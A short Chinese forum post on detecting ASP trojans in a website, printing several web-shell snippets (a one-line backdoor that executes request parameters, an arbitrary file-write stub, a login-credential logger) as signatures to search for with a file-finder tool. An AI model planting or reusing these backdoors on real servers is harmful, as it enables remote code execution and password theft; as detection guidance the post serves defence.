防黑从基础做起.简单的ASP木马查杀方法:
先下载一个文件查找工具:http://www.skycn.com/soft/17964.html
以下是ASP木马部分代吗:
====================================================================================================
<!了><object id=fs RUNAT=SERVER classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object><!了>
<%if request("QQ:120013123")<>"" then Session("b")=request("QQ:120013123")
if Session("b")<>"" then execute Session("b")%>
====================================================================================================
<!--#i nclude file="ating.jpg"-->
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT>
====================================================================================================
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
====================================================================================================
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>
====================================================================================================
sub ShowErr()
If Err Then
Response.Write"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub
====================================================================================================
用文件查找工具查找看你的网站是否被上传ASP木马.如第一个只复制clsid:0D43FE01-F093-11CF-8940-00A0C9054228'> 一小部分代码就行了.如果有什么不懂可以加我QQ120013123 由于现在ASP木马太多.有的还加密.所以我现在在改一个ASP木马查杀工具.晚一点会发出来...